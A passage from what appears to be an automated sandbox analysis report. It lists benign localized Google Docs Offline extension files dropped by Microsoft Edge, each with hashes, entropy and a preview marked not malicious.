                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                      MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                      SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                      SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                      SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):907
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                      MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                      SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                      SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                      SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                      MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                      SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                      SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                      SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                      MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                      SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                      SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                      SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                      MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                      SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                      SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                      SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2846
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                      MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                      SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                      SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                      SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                      MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                      SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                      SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                      SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):963
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                      MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                      SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                      SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                      SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1320
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                      MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                      SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                      SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                      SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):884
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                      MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                      SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                      SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                      SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):980
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                      MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                      SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                      SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                      SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                      MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                      SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                      SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                      SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1969
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                      MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                      SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                      SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
